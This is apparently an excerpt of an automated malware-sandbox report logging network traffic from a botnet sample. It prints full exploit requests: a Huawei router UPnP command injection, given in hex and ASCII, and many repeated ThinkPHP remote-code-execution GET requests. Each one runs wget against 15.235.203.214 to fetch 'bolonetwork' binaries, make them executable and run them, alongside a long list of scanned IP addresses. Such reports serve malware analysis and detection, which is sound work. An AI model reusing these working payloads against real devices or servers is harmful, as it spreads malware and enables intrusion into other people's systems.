32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.189.55.135
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.147.238.186
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.115.56.95
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.87.181.134
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.174.115.244
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.107.86.189
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.155.49.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.80.86.165
                      Source: unknownTCP traffic detected without corresponding DNS query: 221.200.167.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.76.203.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.66.238.102
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.141.91.228
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.201.15.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.37.107.134
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.12.204.52
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.203.14.217
                      Source: unknownTCP traffic detected without corresponding DNS query: 17.113.7.103
                      Source: unknownTCP traffic detected without corresponding DNS query: 125.230.182.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.119.223.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.166.141.245
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.179.199.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.77.131.53
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.233.134.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.23.80.245
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.30.15.103
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.7.162.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.242.31.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 86.49.143.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.4.26.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.166.85.150
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.143.61.103
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.240.255.134
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.236.245.35
                      Source: unknownTCP traffic detected without corresponding DNS query: 175.193.29.172
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.231.189.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.32.17.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.214.240.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.213.7.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.215.252.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.240.149.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.76.26.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.155.27.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.226.72.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.17.13.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.170.128.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.127.202.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 207.93.222.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.143.196.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.143.175.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.254.68.190
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
